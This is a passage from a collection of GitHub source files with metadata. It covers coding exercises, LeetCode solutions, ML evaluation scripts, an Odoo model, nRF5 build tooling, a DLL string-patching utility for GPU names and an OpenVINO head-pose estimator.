'''\n    sameColorCount = 0\n    for i in range(numTrials):\n        onePick = drawing()\n        # if the balls picked have the same color, sameColorCount adds 1\n        if sum(onePick) == 3 or sum(onePick) ==0:\n            sameColorCount += 1\n    \n    return sameColorCount/numTrials\n    \n\ndef drawing():\n    '''\n    Define red balls as 1, green balls as 0,\n    then the bucket list will be [1,1,1,0,0,0]\n    Pick 3 balls from the bucket randomly without replacement.\n    Return the list of balls drawn randomly from the bucket once\n    '''\n    bucket = [1,1,1,0,0,0]\n    result = []\n    for i in range(3):\n        pickedball = random.choice(bucket)\n        result.append(pickedball)\n        bucket.remove(pickedball)\n    return result\n    \n","repo_name":"lingjiangj/MITx-6.00.2x","sub_path":"Exercises/Lecture8-Exercise 4.py","file_name":"Lecture8-Exercise 4.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10738631126","text":"#\n# @lc app=leetcode.cn id=203 lang=python3\n#\n# [203] Remove Linked List Elements\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution:\n    def removeElements(self, head: ListNode, val: int) -> ListNode:\n        if head is None:\n            return head\n        head.next = self.removeElements(head.next, val)\n        if head.val == val:\n            next_node = head.next \n        else:\n            next_node = head\n        return next_node\n\n# @lc code=end\n\n","repo_name":"MaxZN/Leetcode","sub_path":"203.移除链表元素.py","file_name":"203.移除链表元素.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19957433111","text":"import os\nfrom tabulate import tabulate\nfrom scipy.stats import spearmanr\n\ndef getAccuracy(pred, gold):\n\tright = 0.0\n\tfor i in range(0, len(pred)):\n\t\tif pred[i]==gold[i]:\n\t\t\tright += 1.0\n\treturn right/len(pred)\n\ntypes = ['G', 'M', 'S', 'O']\n\nsystems = sorted(os.listdir('../../labels/G'))\nnames = {}\nnames['nn'] = 'SimpleNets-RNN3'\nnames['nn_adadelta'] = 'SimpleNets-RNN2'\nnames['nn_mlp'] = 
'SimpleNets-MLP'\nnames['adaboost'] = 'Ada Boosting'\nnames['dectrees'] = 'Decision Trees'\nnames['gradientboost'] = 'Gradient Boosting'\nnames['randomforest'] = 'Random Forests'\nnames['sgd'] = 'SGD'\nnames['svm'] = 'SVM'\nnames['allgood'] = 'All Good'\nnames['allok'] = 'All Ok'\nnames['allbad'] = 'All Bad'\n\nscores = {}\nfor system in systems:\n\tscores[system] = []\n\nfor type in types:\n\tgold = [item.strip().split('\\t')[2] for item in open('../../corpora/'+type+'_test.txt')]\n\tgolds = [float(item.strip().split('\\t')[2]) for item in open('../../corpora/'+type+'_test.txt')]\n\tfor system in systems:\n\t\tfiles = os.listdir('../../labels/'+type+'/'+system)\n\t\tmaxacc = -1\n\t\tmaxspear = 0\n\t\tmaxfile = None\n\t\tfor file in files:\n\t\t\tpred = [item.strip().split('\\t')[0] for item in open('../../labels/'+type+'/'+system+'/'+file)]\n\t\t\tpreds = [float(item.strip().split('\\t')[1]) for item in open('../../labels/'+type+'/'+system+'/'+file)]\n\t\t\tpreds[0] = preds[0]+0.00000001\n\t\t\tacc = getAccuracy(pred, gold)\n\t\t\tif acc>maxacc:\n\t\t\t\tmaxacc = acc\n\t\t\t\tmaxfile = file\n\t\t\tspear, f = spearmanr(preds, golds)\n\t\t\tif spear>maxspear:\n\t\t\t\tmaxspear = spear\n\t\tscores[system].append((maxacc, maxspear))\n\nfor system in sorted(scores.keys()):\n\tif system in names:\n\t\tnewline = names[system]\n\t\tfor value in scores[system]:\n\t\t\tnewline += r' & $' + \"%.3f\" % value[0] + r'$ & $' + \"%.3f\" % value[1] + r'$'\n\t\tnewline += r' \\\\'\n\t\tprint(newline)\n","repo_name":"ghpaetzold/phd-backup","sub_path":"qats/scripts/evaluators/formatted_accuracy.py","file_name":"formatted_accuracy.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12494275676","text":"\r\nprint(\"Distance (1)\")\r\nprint(\"Time (2)\")\r\nprint(\"Temperature (3)\")\r\na = input(\"What do you want to convert: \")\r\n\r\nif a == '1':\r\n    Distance()\r\nelif a == '2':\r\n    Time()\r\nelif a == '3':\r\n    Temperature()\r\nelse:\r\n    print(\"Invalid input\")\r\n\r\n","repo_name":"floriangtfr/Converter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23710717568","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\nfrom fishDataset import fishDataset\nfrom torch.utils.data import Dataset, DataLoader\nfrom CNNmodel import *\nimport torch.optim as optim\n\nclasses = (\"ALB\", \"BET\", \"DOL\", \"LAG\", \"NoF\", \"OTHER\", \"SHARK\", \"YFT\")\n\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\ntransform = transforms.Compose([\n    transforms.ToPILImage(),\n    transforms.Resize((155, 227)),\n    transforms.ToTensor(),\n    transforms.Normalize((0.4042, 0.4353, 0.3998), (0.2251, 0.2185, 0.2127))\n])\n\nbatch_size = 4\n\ndataset = fishDataset(\"FishBoxes/Fishes/\",\n                      \"FishBoxes/labels.csv\", trans=transform)\n\n# the dataset used here differs from the test split used during training, on which the model\n# reached its reported accuracy, so the accuracy will probably be higher (should I save the test split?)\n# train_size = int(0.8 * len(dataset))\n# test_size = len(dataset) - train_size\n# trainset, testset = torch.utils.data.random_split(\n#     dataset, [train_size, test_size])\n\ntestloader = DataLoader(\n    dataset, batch_size=batch_size, 
shuffle=True)\n\ndataiter = iter(testloader)\nimages, labels = next(dataiter)  # .next() was removed from newer PyTorch iterators\n\nimages = images.to(device)\n\nPATH = './SimpleCNN/SavedModels/simpleModelWithAdamW_86.8%/simpleModelWithAdamW_86.8%.pth'\nnet = SimpleModel()\nnet.load_state_dict(torch.load(PATH))\nnet.to(device)\n\n\n# def imshow(img):\n#     invTrans = transforms.Compose([transforms.Normalize(mean=[0., 0., 0.],\n#                                                          std=[1/0.2251, 1/0.2185, 1/0.2127]),\n#                                     transforms.Normalize(mean=[-0.4042, -0.4353, -0.3998],\n#                                                          std=[1., 1., 1.]),\n#                                     ])\n#     img = img.cpu()\n#     img = invTrans(img)\n#     npimg = img.numpy()\n#     plt.imshow(np.transpose(npimg, (1, 2, 0)))\n#     plt.show()\n\n\n# print('GroundTruth: ', ' '.join(f'{classes[labels[j]]:5s}' for j in range(4)))\n# imshow(torchvision.utils.make_grid(images))\n\n# outputs = net(images)\n\n# outputs.to(device)\n\n# _, predicted = torch.max(outputs, 1)\n\n# print('Predicted: ', ' '.join(f'{classes[predicted[j]]:5s}'\n#       for j in range(4)))\n\n\ncorrect = 0\ntotal = 0\n# since we're not training, we don't need to calculate the gradients for our outputs\nwith torch.no_grad():\n    for data in testloader:\n        images, labels = data\n        images = images.to(device)\n        labels = labels.to(device)\n        # calculate outputs by running images through the network\n        outputs = net(images)\n        # the class with the highest energy is what we choose as prediction\n        _, predicted = torch.max(outputs.data, 1)\n        print(outputs.data)\n        total += labels.size(0)\n        correct += (predicted == labels).sum().item()\n\nprint(\n    f'Accuracy of the network on the whole dataset: {100 * correct // total} %')\n\n\n# prepare to count predictions for each class\ncorrect_pred = {classname: 0 for classname in classes}\ntotal_pred = {classname: 0 for classname in classes}\n\n# again no gradients needed\nwith torch.no_grad():\n    for data in testloader:\n        images, labels = data\n        images = images.to(device)\n        labels = labels.to(device)\n        outputs = net(images)\n        _, predictions = torch.max(outputs, 1)\n        # collect the correct predictions for each class\n        for label, prediction in zip(labels, predictions):\n            if label == prediction:\n                correct_pred[classes[label]] += 1\n            total_pred[classes[label]] += 1\n\naccPerClass = {}\n# print accuracy for each class\nfor classname, correct_count in correct_pred.items():\n    accuracy = 100 * float(correct_count) / total_pred[classname]\n    accPerClass[classname] = accuracy\n\n    # print(f'Accuracy for class: {classname:5s} is {accuracy:.1f} %')\n\nd_view = [(v, k) for k, v in accPerClass.items()]\nd_view.sort(reverse=True) # natively sort tuples by first element\nfor v, k in d_view:\n    # print(\"%s: %d\" % (k, v))\n    print(f'Accuracy for class: {k:6s} is {v:.1f} %')\n","repo_name":"LeonardoBerti07/Image-Classification-Project","sub_path":"SimpleCNN/testSavedModels.py","file_name":"testSavedModels.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28178089252","text":"\"\"\"\r\nBuild a new linked list: compare the current nodes of the two lists and link in whichever is smaller.\r\nOnce one list is exhausted, every remaining element of the other list is larger, so it can be appended as-is.\r\nComplexity O(m+n)\r\n\"\"\"\r\ndef mergeTwoLists(l1,l2):\r\n    # first handle the case where both lists are empty\r\n    if not l1 and not l2:\r\n        return None\r\n    # create a new list that collects the elements as they are compared\r\n    result = ListNode(0)\r\n    l = result\r\n    while l1 and l2:\r\n        if l1.val < l2.val:\r\n            l.next = l1\r\n            l1 = l1.next\r\n        else:\r\n            l.next = l2\r\n            l2 = l2.next\r\n        # advance the merged list; its current position was just assigned\r\n        l = l.next\r\n    # append whatever remains of the other list\r\n    l.next = l1 or l2\r\n    # return from the second node onwards; the first node is the dummy ListNode(0) we created\r\n    return result.next\r\n    
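\r\n\r\n# A quick illustrative run (hypothetical: assumes the usual LeetCode ListNode(val, next=None) class, which this file does not define):\r\n#   l1 = ListNode(1, ListNode(3, ListNode(5)))\r\n#   l2 = ListNode(2, ListNode(4))\r\n#   mergeTwoLists(l1, l2) links the nodes as 1 -> 2 -> 3 -> 4 -> 5, visiting each node once (O(m+n)).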
\r\n","repo_name":"jasonusaco/Leetcode-Practice","sub_path":"Linked List/lc21.py","file_name":"lc21.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15956383689","text":"# import numpy for use of matrix multiplication\nimport numpy as np\n# import scipy for use in linear regression base testing\nfrom scipy import linalg\n# allows data input processing\nimport pandas as pd\n# allows a deep copy\nfrom copy import deepcopy\n\n# import sklearn modules for use in lin regression\n# import function to split data\nfrom sklearn.model_selection import train_test_split\n# import function to generate mean squared error\nfrom sklearn.metrics import mean_squared_error\n# import dataset for use in boston dataset\nfrom sklearn import linear_model\n# import matplotlib to allow visualization of data\nimport matplotlib.pyplot as plt\n# import LineCollection to draw lines\nfrom matplotlib.collections import LineCollection\n\n\ndef read_table(path):\n ''' input the file as a pandas table '''\n return pd.read_csv(path,header=0)\n \n\ndef remove_columns(table):\n ''' process the data table by removing unwanted columns '''\n # find all columns that are errors\n drop_col = [x for x in table.columns if x.startswith('e')]\n # add the id to columns to remove\n drop_col.append('Nr')\n # drop preselected columns and remove rows with NaN\n proc = table.drop(drop_col,axis=1).dropna()\n # return processed data\n return proc\n\n\ndef process_data(data):\n ''' modify data such that it represents the 80% training, 20% testin '''\n # select the index for the training data\n ntrain = round(data.shape[0]*0.2)\n # split training data and target by 80% and 20%\n data_train,target_train = data[ntrain:,1:],data[ntrain:,:1]\n # split testing data and target by 80% and 20%\n data_test,target_test = data[:ntrain,1:],data[:ntrain,:1]\n # return training data and target, and testing data and target\n return data_train,target_train,data_test,target_test\n\n\ndef parse(path='data/COMBO17.csv'):\n ''' get training and testing data and target from data file '''\n # input pandas table from filepath\n init_table = read_table(path)\n # remove the columns and rows that are unusable\n table = remove_columns(init_table)\n # convert pandas table to numpy array\n data = np.array(table)\n # return the training and testing data and target\n return process_data(data)\n\n\ndef plot_lines(title,ax,target,predict):\n ''' plot a single subplot based on targets and predictions '''\n # create single scatterplot\n ax.scatter(target,predict,edgecolors=(0,0,0))\n # get minimum and maximum from target data\n data_min,data_max = np.amin(target),np.amax(target)\n # set regression line\n ax.plot([data_min,data_max],[data_min,data_max],'k.--',lw=4)\n # set the title for the subplot\n ax.set_title(title)\n # label the x axis\n ax.set_xlabel('Measured')\n # label the y axis\n ax.set_ylabel('Predicted')\n\n\ndef plot_dots(title,ax,target,predict):\n ''' plot a single subplot based on targets and predictions '''\n # get number of data points\n N = len(predict)\n # create range of values based on number data points\n x = np.arange(N)\n # get array of indeces from sorted target data\n inds = np.argsort(target.T[0])\n # sort target data\n targ_s = target.T[0][inds]\n # sort prediction data\n pred_s = predict.T[0][inds] \n # get coordinates of lines connecting target and prediction\n points = np.array([[[i, targ_s[i]], [i, pred_s[i]]] for i in range(N)])\n # create 
line object based on coordinates\n lines = LineCollection(points,linewidths=1,colors='black',zorder=0)\n # halve the width of the lines\n lines.set_linewidths(0.5*np.ones(N))\n # set the target points on subplot\n ax.scatter(x,targ_s,s=9,edgecolors=(0,0,0))\n # set the prediction points on the subplot\n ax.scatter(x,pred_s,s=9,edgecolors=(0,0,0))\n # add lines between target and prediction\n ax.add_collection(lines)\n # set title of subplot\n ax.set_title(title)\n # set title of x axis\n ax.set_xlabel('Measured')\n # set title of y axis\n ax.set_ylabel('Predicted')\n\n\ndef print_one(title,weight,mse_test,mse_train):\n ''' prints the mean squared errors per each type of analysis '''\n # print type of analysis\n print(title,'\\n')\n # print training mean squared error\n print('Training Mean Squared Error:',mse_train)\n # print testing mean squared error\n print('Testing Mean Squared Error:',mse_test)\n # create equation with coefficients and variables\n weight_str = [str(w)+'x'+str(i) for i,w in enumerate(weight[0])]\n # print the weight equation\n print('Weights:\\n',' + '.join(weight_str),'\\n\\n')\n\n\ndef output_one(title,target,weight,prediction,mse_test,mse_train):\n ''' output a single entry and graph '''\n # create single subplot\n fig1, ax1 = plt.subplots(1,sharex=True)\n # create single subplot\n fig2, ax2 = plt.subplots(1,sharex=True)\n # print type of analysis, weight, mean squared errors\n print_one(title,weight,mse_test,mse_train)\n # plot the linear regression line\n plot_lines(title,ax1,target,prediction)\n # plot the offset between target and prediction\n plot_dots(title,ax2,target,prediction)\n # show the graphs\n plt.show()\n\n \n\ndef linear_regression(data_train,target_train,data_test,target_test):\n ''' linear regression function from training and testing data and target '''\n # initialize linear regression object\n regr = linear_model.LinearRegression()\n # train the regression model with the training data and target\n regr.fit(data_train,target_train)\n # calculate the mean squared error for the training data\n mse_train = mean_squared_error(target_train,regr.predict(data_train))\n # calculate the predicted target from the testing data with the coefficients\n predict = regr.predict(data_test)\n # calculate the mean squared error for the testing data\n mse_test = mean_squared_error(target_test,predict)\n # return the weights, predicted target, and mean squared errors for training \n return regr.coef_,predict,mse_test,mse_train\n\n\ndef driver():\n ''' intiialize and run testing on data '''\n # return training and testing data and target\n data_train,target_train,data_test,target_test = parse()\n # git weights, predicted target, mse testing and training from linear regression model\n weights,prediction,mse_test,mse_train = linear_regression(data_train,target_train,data_test,target_test)\n # output print and graphs from processed data\n output_one('sklearn',target_test,weights,prediction,mse_test,mse_train)\n\n \nif __name__ == '__main__':\n ''' entry point of program '''\n driver()\n\n\n# end of file\n\n","repo_name":"treyamador/machine-learning","sub_path":"regression/space.py","file_name":"space.py","file_ext":"py","file_size_in_byte":6539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21499992176","text":"from hashlib import md5\n\n\nclass D3D9Generator:\n _renderer_offset = 65780\n _renderer_len = 16\n _gpu_offset = _renderer_offset + _renderer_len\n _gpu_len = 24\n\n _full_hash = 
\"F72386EFF8B866EB881FE8E87261A2B3\"\n _partial_hash = \"1E5F7C4EBE25B462A8F61B40907B1BD3\"\n\n def __init__(self, source: bytes):\n self._dll_array = bytearray(source)\n\n def set_renderer(self, name: str):\n self.set_bytes(self._renderer_offset, self._renderer_len, name)\n\n def set_gpu(self, name: str):\n self.set_bytes(self._gpu_offset, self._gpu_len, name)\n\n def set_bytes(self, start: int, length: int, value: str):\n for i in range(length):\n if len(value) > i:\n self._dll_array[start + i] = ord(value[i])\n else:\n self._dll_array[start + i] = 0x00\n\n def has_full_hash(self):\n return self._full_hash.lower() in md5(self._dll_array).hexdigest().lower()\n\n def has_partial_hash(self):\n start = self._gpu_offset + self._gpu_len\n end = start + len(self._dll_array) - (self._gpu_offset + self._gpu_len)\n\n md = md5()\n md.update(self._dll_array[: self._renderer_offset - 1])\n md.update(self._dll_array[start:end])\n\n return self._partial_hash.lower() in md.hexdigest().lower()\n\n def write_dll(self, filename: str):\n with open(filename, \"wb\") as file:\n file.write(self._dll_array)\n\n\ndef main():\n with open(\"d3d9_source.dll\", \"rb\") as file:\n source_dll = file.read()\n\n generator = D3D9Generator(source_dll)\n if not generator.has_full_hash():\n raise Exception(\"Internal DLL is corrupted\")\n\n gpu = \"\"\n\n while len(gpu) == 0:\n gpu = input(\"Enter your GPU name: \")\n\n print(f\"Generating d3d9.dll for {gpu}\")\n\n generator.set_gpu(gpu)\n\n if not generator.has_partial_hash():\n raise Exception(\"Internal DLL is corrupted after setting\")\n\n generator.write_dll(\"d3d9.dll\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tinytengu/d3d9-generator","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1508829552","text":"from collections import deque\nimport sys\nn = int(input())\nmaap = [list(map(str, (sys.stdin.readline().strip()))) for _ in range(n)]\nvisited = [[0] * n for _ in range(n)]\ndx = [0, 0, 1, -1]\ndy = [1, -1, 0, 0]\n\ndef bfs(start):\n q = deque()\n q.append(start)\n visited[start[0]][start[1]] = 1\n num = 1\n while q:\n x, y = q.popleft()\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n if 0 <= nx < n and 0 <= ny < n:\n if visited[nx][ny] == 0 and maap[nx][ny] == '1':\n q.append((nx, ny))\n visited[nx][ny] = visited[x][y]\n num += 1\n return num\n\n\nnuma = 0\nnum_ans = []\nfor i in range(n):\n for j in range(n):\n if visited[i][j] == 0 and maap[i][j] == '1':\n numa += 1\n num_ans.append(bfs((i, j)))\nprint(numa)\nnum_ans.sort()\nfor k in num_ans:\n print(k)\n\n","repo_name":"YoungTae0406/bj-pg_Algorithm","sub_path":"2667_postApartNumb.py","file_name":"2667_postApartNumb.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22970886869","text":"from odoo import fields, models, api, _\n\n\nclass Contract(models.Model):\n _inherit = 'vnitpro.contract'\n\n procurement_id = fields.Many2one('vnitpro.procurement', 'Procurement', track_visibility=\"onchange\")\n procurement_formality = fields.Many2one('vnitpro.procurement.formality',\n related=\"procurement_id.procurement_formality_id\", readonly=True)\n cost_estimate = fields.Float(\n 'Cost Estimate', related=\"procurement_id.vat_information\", digits=(3, 2), readonly=True)\n price_plan = fields.Float('Price Plan', 
related=\"procurement_id.after_tax\", readonly=True)\n    price_won_procurement = fields.Float(\n        'Price Won Procurement', compute=\"_compute_price_won_procuremnt\", digits=(3, 2))\n\n    @api.one\n    @api.depends('procurement_id')\n    def _compute_price_won_procuremnt(self):\n        self.price_won_procurement = 0\n        for expertise_result_id in self.procurement_id.expertise_result_ids:\n            if expertise_result_id.expertise_results == 1:\n                self.price_won_procurement = expertise_result_id.exposure_price_with_vat\n                break\n","repo_name":"tu2305/VNITPro_erp","sub_path":"vnitpro_contract_procurement_rel/models/vnitpro_contract.py","file_name":"vnitpro_contract.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14731449234","text":"#!python\n\n# Template for batch file operations\n# Export exe: pyinstaller --onefile --nowindowed temp.py\n\nimport os\nimport sys\n\nPIPE = \"│\"\nELBOW = \"└──\"\nTEE = \"├──\"\nPIPE_PREFIX = \"│ \"\nSPACE_PREFIX = \" \"\n\ndef list_files(startpath):\n\n    for root, dirs, files in os.walk(startpath):\n        break\n    \n    tree = [] \n    for i, file in enumerate(files):\n        if i == len(files)-1 and len(dirs) == 0:\n            joint = ELBOW\n        else:\n            joint = TEE\n        tree.append('{} {}'.format(joint, file))\n    \n    for i, dir in enumerate(dirs):\n        if i == len(dirs)-1:\n            joint = ELBOW\n            space = SPACE_PREFIX\n        else:\n            joint = TEE\n            space = PIPE_PREFIX\n        \n        tree.append('{} {}/'.format(joint, dir))\n        branches = list_files(os.path.join(root,dir))\n        for branch in branches:\n            tree.append('{}{}'.format(space, branch))\n\n    return tree\n\n\ndef processPath(startpath):\n\n    tree = list_files(startpath)\n    string = '../{}/\\n'.format(os.path.basename(startpath))\n\n    for t in tree:\n        string += '{}\\n'.format(t)\n    string = string.replace('\\n', '\\n ')\n\n    print(string) \n    output = open(\"文件列表.txt\", \"w\", encoding='utf-8')\n    output.write(string)\n    output.close()\n\ndef main():\n\n    # Run via a file or folder path entered inside the program\n    if len(sys.argv) <= 1:\n        processPath(\".\")\n\n    # Otherwise run via command-line arguments, or by dragging a file or folder onto the executable\n    for i in range(1, len(sys.argv)):\n        processPath(sys.argv[i])\n\nif __name__ == '__main__':\n    main()\n    print('\\nDONE')\n    input()\n","repo_name":"wjdready/Code","sub_path":"Lang/Python/一些工具脚本/批量统计文件/temp2.py","file_name":"temp2.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"7725317242","text":"from __future__ import annotations\n\nimport json\nfrom unittest import TestCase\n\nfrom nrf5_cmake.library import Library, LibraryProperty, Property\nfrom nrf5_cmake.library_description import LibraryDescription, LibraryVariant, LibraryPatch, LibraryOperation, LibraryVersion\nfrom nrf5_cmake.version import Version\nfrom typing import Any, Dict, List, Set, Tuple\n\n\ndef libraries_load_from_file(filepath: str) -> Dict[str, LibraryDescription]:\n    libs: Dict[str, LibraryDescription] = {}\n    with open(filepath, 'r') as file:\n        json_libs: Dict[str, Any] = json.load(file)\n\n        if not isinstance(json_libs, dict):\n            raise Exception(\"Expected a dictionary of libraries\")\n\n        for json_lib_name in json_libs:\n            json_lib = json_libs[json_lib_name]\n            libs[json_lib_name] = LibraryDescription.from_json(json_lib)\n\n    return libs\n\n\ndef libraries_save_to_file(filepath: str, libraries: Dict[str, LibraryDescription]):\n    json_libs: Dict[str, Any] = {}\n\n    with open(filepath, 'w') as file:\n        for lib_name, lib in libraries.items():\n            json_libs[lib_name] = lib.to_json()\n\n        
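# a single dump call writes the collected mapping out as one valid JSON document\n        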
json.dump(json_libs, file, indent=2)\n\n\ndef libraries_dependencies_per_sdk(selected_libraries: Dict[str, LibraryDescription],\n all_libraries: Dict[str, LibraryDescription],\n supported_sdks: List[Version]) -> Dict[Version, Set[str]]:\n\n # Collect a list of dependencies for each SDK version.\n sdk_dependencies: Dict[Version, Set[str]] = {}\n for sdk_version in supported_sdks:\n\n # Get list of all dependencies including libraries\n dependencies: Set[str] = set()\n for (library_name, library_desc) in selected_libraries.items():\n library_for_sdk = library_desc.library_for_sdk_version(sdk_version)\n if library_for_sdk == None:\n continue\n\n dependencies.add(library_name)\n dependencies.update(library_for_sdk.get_prop(\n LibraryProperty.DEPENDENCIES\n ).get_all_items())\n\n # Iterate over all existing dependencies and collect new ones.\n # If expanded list of dependencies is bigger than original ones\n # continue.\n while True:\n new_dependencies = dependencies.copy()\n for dependency in dependencies:\n # Check if dependecy exists...\n if not dependency in all_libraries:\n print(f\"WARNING: dependency {dependency} doesn't exist\")\n continue\n library_dep_desc = all_libraries[dependency]\n\n # Check if dependency exists for this SDK version.\n library_dep = library_dep_desc.library_for_sdk_version(\n sdk_version)\n\n if library_dep == None:\n print(\n f\"WARNING: dependency {dependency} should exist for SDK {sdk_version}\")\n continue\n\n # Get all dependencies and apply them.\n library_dep_dep_list = library_dep.get_prop(\n LibraryProperty.DEPENDENCIES\n ).get_all_items()\n new_dependencies.update(library_dep_dep_list)\n\n # Check if two sets are the same\n if new_dependencies == dependencies:\n break\n\n # Use new extended list of dependencies.\n dependencies = new_dependencies\n\n # Add generated dependencies to version\n sdk_dependencies[sdk_version] = dependencies\n\n return sdk_dependencies\n\n\nclass LibrariesDependenciesPerSdkTestCase(TestCase):\n def test_dependencies(self):\n\n sdk_14 = Version.from_string(\"14.0.0\")\n sdk_15 = Version.from_string(\"15.0.0\")\n sdk_16 = Version.from_string(\"16.0.0\")\n\n library_a = LibraryDescription(\n variant=LibraryVariant.OBJECT,\n library=Library(\n dependencies=Property(public={\"b\"})\n ),\n sdk_version=LibraryVersion(sdk_15),\n patches=[\n LibraryPatch(\n operation=LibraryOperation.ADD,\n sdk_version=LibraryVersion(sdk_15),\n library=Library(dependencies=Property(public={\"c\"}))\n ),\n LibraryPatch(\n operation=LibraryOperation.REMOVE,\n sdk_version=LibraryVersion(sdk_16),\n library=Library(dependencies=Property(public={\"c\"}))\n ),\n LibraryPatch(\n operation=LibraryOperation.ADD,\n sdk_version=LibraryVersion(sdk_16),\n library=Library(dependencies=Property(public={\"d\"}))\n ),\n ]\n )\n\n library_b = LibraryDescription(\n variant=LibraryVariant.OBJECT,\n )\n\n library_c = LibraryDescription(\n variant=LibraryVariant.OBJECT\n )\n\n library_d = LibraryDescription(\n variant=LibraryVariant.OBJECT,\n library=Library(dependencies=Property(public={\"e\"}))\n )\n\n library_e = LibraryDescription(\n variant=LibraryVariant.OBJECT\n )\n\n library_f = LibraryDescription(\n variant=LibraryVariant.OBJECT\n )\n\n all_libraries = {\n \"a\": library_a,\n \"b\": library_b,\n \"c\": library_c,\n \"d\": library_d,\n \"e\": library_e,\n \"f\": library_f\n }\n\n supported_sdks = [\n sdk_14,\n sdk_15,\n sdk_16\n ]\n\n result = libraries_dependencies_per_sdk(\n {\"a\": library_a},\n all_libraries,\n supported_sdks\n )\n\n 
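# SDK 14 predates library_a's first supported version, so no libraries should be selected\n        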
self.assertEqual(result[sdk_14], set())\n self.assertEqual(result[sdk_15], {\"a\", \"b\", \"c\"})\n self.assertEqual(result[sdk_16], {\"a\", \"b\", \"d\", \"e\"})\n","repo_name":"Polidea/cmake-nRF5x","sub_path":"ci/scripts/python/nrf5_cmake/library_operations.py","file_name":"library_operations.py","file_ext":"py","file_size_in_byte":5937,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"21"} +{"seq_id":"71532367414","text":"'''\nThis is a sample class for a model. You may choose to use it as-is or make any changes to it.\nThis has been provided just to give you an idea of how to structure your model class.\n'''\n\nfrom openvino.inference_engine import IENetwork, IECore\nimport cv2\nimport numpy as np\nimport math\nimport time\nfrom model import Model_X\n\nclass HeadPoseEstimation(Model_X):\n '''\n Class for the Face Detection Model.\n '''\n \n def __init__(self, model_name, device='CPU', extensions=None):\n super().__init__(model_name, device='CPU', extensions=None)\n \n def predict(self, image, face_image, face_boxes, display_flag=True):\n '''\n TODO: You will need to complete this method.\n This method is meant for running predictions on the input image.\n '''\n input_img = self.preprocess_input(face_image)\n input_name = self.input_name\n input_dict={input_name:input_img}\n\n start=time.time()\n self.net.start_async(request_id=0, \n inputs=input_dict)\n status = self.net.requests[0].wait(-1)\n if status == 0:\n inference_time = time.time()- start\n outputs = self.net.requests[0].outputs\n face_image, angles = self.preprocess_output(outputs, image, face_image, face_boxes, display_flag)\n return face_image, angles, inference_time\n\n def preprocess_input(self, image):\n '''\n Before feeding the data into the model for inference,\n you might have to preprocess it. This function is where you can do that.\n '''\n n, c, h, w = self.input_shape\n input_img = image\n input_img=cv2.resize(input_img, (w,h), interpolation = cv2.INTER_AREA)\n input_img = input_img.transpose((2,0,1))\n input_img = input_img.reshape((n, c, h, w))\n return input_img\n\n def preprocess_output(self, outputs, image, face, facebox, display_flag):\n '''\n Before feeding the output of this model to the next model,\n you might have to preprocess the output. 
This function is where you can do that.\n '''\n p = outputs['angle_p_fc'][0][0]\n r = outputs['angle_r_fc'][0][0]\n y = outputs['angle_y_fc'][0][0]\n\n\n if display_flag:\n cv2.putText(image,\"y:{:.1f}\".format(y), (20,20), 0, 0.6, (255,255,0))\n cv2.putText(image,\"p:{:.1f}\".format(p), (20,40), 0, 0.6, (255,255,0))\n cv2.putText(image,\"r:{:.1f}\".format(r), (20,60), 0, 0.6, (255,255,0))\n \n xmin, ymin,_ , _ = facebox\n face_center = (xmin + face.shape[1] / 2, ymin + face.shape[0] / 2, 0)\n focal_length = 950.0\n scale = 50\n image = self.draw_axes(image, face_center, y, p, r, scale, focal_length)\n\n return image, (p, r, y)\n\n # from : https://knowledge.udacity.com/questions/171017\n def draw_axes(self, frame, center_of_face, yaw, pitch, roll, scale, focal_length):\n yaw *= np.pi / 180.0\n pitch *= np.pi / 180.0\n roll *= np.pi / 180.0\n cx = int(center_of_face[0])\n cy = int(center_of_face[1])\n Rx = np.array([[1, 0, 0],\n [0, math.cos(pitch), -math.sin(pitch)],\n [0, math.sin(pitch), math.cos(pitch)]])\n Ry = np.array([[math.cos(yaw), 0, -math.sin(yaw)],\n [0, 1, 0],\n [math.sin(yaw), 0, math.cos(yaw)]])\n Rz = np.array([[math.cos(roll), -math.sin(roll), 0],\n [math.sin(roll), math.cos(roll), 0],\n [0, 0, 1]])\n # R = np.dot(Rz, Ry, Rx)\n # ref: https://www.learnopencv.com/rotation-matrix-to-euler-angles/\n # R = np.dot(Rz, np.dot(Ry, Rx))\n R = Rz @ Ry @ Rx\n # print(R)\n camera_matrix = self.build_camera_matrix(center_of_face, focal_length)\n xaxis = np.array(([1 * scale, 0, 0]), dtype='float32').reshape(3, 1)\n yaxis = np.array(([0, -1 * scale, 0]), 